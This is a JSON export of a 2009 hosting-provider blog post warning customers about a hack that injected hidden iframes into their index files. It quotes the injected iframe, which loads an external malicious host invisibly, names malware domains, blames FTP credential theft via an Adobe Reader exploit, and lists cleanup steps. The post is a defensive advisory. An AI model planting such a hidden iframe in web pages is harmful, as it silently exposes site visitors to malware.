{"id":34,"date":"2009-07-15T22:28:28","date_gmt":"2009-07-15T22:28:28","guid":{"rendered":""},"modified":"2012-06-08T12:42:26","modified_gmt":"2012-06-08T04:42:26","slug":"cyberiahosting-users-alert-malicious-iframe-hack","status":"publish","type":"post","link":"https:\/\/matnet.my\/blog\/2009\/07\/cyberiahosting-users-alert-malicious-iframe-hack\/","title":{"rendered":"Cyberiahosting Users &#8211; ALERT &#8211; Malicious IFrame hack"},"content":{"rendered":"<p>In the last 2 weeks I got 2 issues regarding this matter.<\/p>\n<p>[b]The scenario:[\/b]<\/p>\n<p>All index* files were edited to redirect to a malicious web site using an iframe.<\/p>\n<p>Example:<\/p>\n<p>[quote]&lt;iframe src=&quot;http:\/\/u9k.ru:8080\/index.php&quot; width=151 height=125 style=&quot;visibility: hidden&quot;&gt;&lt;\/iframe&gt;[\/quote]\n\n\n[b]After investigation:[\/b]\n\n1. The file owner is the current user, not nobody or others.\n2. The files were uploaded by the user with valid access credentials.\n3. All index* files were edited in the user's www directory.\n4. Only the current user's account was infected.\n\n\n[b]How:[\/b]\n\nThe FTP passwd was hacked.\n\nThere are 2 reasons the passwd was hacked.\n\n1. Adobe Acrobat Vulnerability\n\n[quote]\nI checked the PDF file with another online service called Wepawet and it identified the malicious code and the exploited vulnerability. Here is the report. This virus makes use of a known vulnerability of Adobe Acrobat (Reader) CVE-2008-2992: \u201cStack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument\u201d.\n\nIf you are still using Acrobat Reader 8.1.2 or older, upgrade ASAP. The current version is 9.1.\n\nThis PDF file silently downloads a malicious binary (Windows executable) file from litehitscar .cn, which resides on the same server with hyperliteautoservices .cn (IP 94 .247 .3 .151). 
\n\nquote from - http:\/\/blog.unmaskparasites.com\/2009\/04\/15\/malicious-income-iframes-from-cn-domains\/ \n[\/quote]\n\n2. FileZilla Vulnerability.\n\n\n[b]How to clean up:[\/b]\n\n1. Start with your own computer. Scan it with anti-virus and anti-spyware tools.\n2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)\n3. Now keep the new passwords secure. Don\u2019t use auto-upload features of your web site editors. Enter passwords every time you upload new content instead. Use [url=http:\/\/en.wikipedia.org\/wiki\/SFTP]SFTP[\/url] instead of FTP if possible.\n4. Now remove the malicious code (the iframes) from your files on the server. The easiest way to do it is to upload clean content from a backup.\n5. Scan your server directories for any new\/suspicious files (don\u2019t forget to check hidden files). Remove anything that should not be there.\n6. If your site was flagged by Google, request a malware review via [url=http:\/\/www.google.com\/webmasters\/tools\/]Webmaster Tools[\/url].\n7. Regularly check your site with diagnostics tools of your choice (my [url=http:\/\/www.unmaskparasites.com\/]Unmask Parasites[\/url] can be one of them) to be sure your site is clean.\n8. Regularly update third party software on your PC.\n<\/p>\n","protected":false},"excerpt":{"rendered":"<p>In the last 2 weeks I got 2 issues regarding this matter. 
[b]The scenario:[\/b] All index* files were edited to redirect to a malicious &hellip; <a href=\"https:\/\/matnet.my\/blog\/2009\/07\/cyberiahosting-users-alert-malicious-iframe-hack\/\" class=\"more-link\">More <span class=\"screen-reader-text\">Cyberiahosting Users &#8211; ALERT &#8211; Malicious IFrame hack<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-34","post","type-post","status-publish","format-standard","hentry","category-www","standard"],"_links":{"self":[{"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/posts\/34","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/comments?post=34"}],"version-history":[{"count":2,"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/posts\/34\/revisions"}],"predecessor-version":[{"id":64,"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/posts\/34\/revisions\/64"}],"wp:attachment":[{"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/media?parent=34"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/categories?post=34"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/tags?post=34"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}